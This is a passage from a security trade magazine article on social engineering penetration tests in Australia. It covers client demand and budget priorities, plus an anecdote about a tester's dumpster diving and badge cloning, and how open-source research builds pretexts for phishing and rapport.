Bang for buck
Australian penetration testing firms have seen a rise in demand for their customised and targeted social engineering tests, but the volume is still low compared to technical penetration tests. Drazic says his company runs its multi-faceted ‘Red Cell’ social engineering tests and training about once a month for typically large companies with Australian offices. Other penetration testers report similar figures, with social engineering accounting for less than half of all tests.
Once the tests are completed, clients trained to defend against real world attacks. “In our experience, if done right, businesses do improve. We stay close with them and in all cases clients we have worked with have been very keen to expand upon the work.” Drazic says testers should mimic how “smart criminals” operate, and have intimate knowledge of previous data breaches that result from social engineering attacks. “Any monkey can make a phone call and try to get a password.”
But Ellsmore warns there are sometimes better ways spend security budgets to get bang for buck, namely in understanding the information perimeter of the business, testing the security of applications and testing and training staff. He notes that few organisations could prevent staff from stealing data and that the threat of a physical social engineering intrusion is low. “Is someone walking through the office a likely compromise? No, and there should be video footage of an intruder. There are many more lower-risk avenues of attack to look into.”
Tools of the trade
The social engineer isn’t a whimsical liar, but a methodical analyst. Both penetration testers and malicious attackers research a target organisation using public information including staff Facebook profiles, scans of IT infrastructure and documents left in rubbish bins.
HackLabs director Chris Gatford recently proved how lucrative humble dumpster diving could be when, on a job, he gave the receptionist of a Sydney business a friendly wave as he wheeled out a bin full of sensitive documents from the executive’s office and into an adjacent hotel. In the apartment, Gatford sifted through the bin of documents marked for shredding and pulled out usernames and passwords, staff salaries and a spreadsheet listing critical systems. “They were owned,” he says.
Gatford wasn’t simply handed the bin. On his journey to the executive’s office, Gatford swiped an unattended staff badge and used a publicly-known duplication method to clone the card and assign it sufficient privileges to enter restricted areas.
Open source tools including Maltego are used by attackers and penetration testers to help determine data relationships between information sources. It could reveal, for example, that a target’s phone number or email address was published on motorcycle web sites. This data builds a so-called pretext, which is background information that engineers use to con targets more effectively. The information is often used to craft targeted phishing emails or used as a conversation topic to build rapport.
The aim of the pretext is to make a target feel comfortable and familiar and to ease the elicitation of information. It is a tactic used by many professionals including sales staff, doctors, lawyers and clairvoyants, and allows social engineers to use a fictitious persona – like Wayne the auditor – that best fits the scenario.
This article first appeared in SC Magazine's March print edition.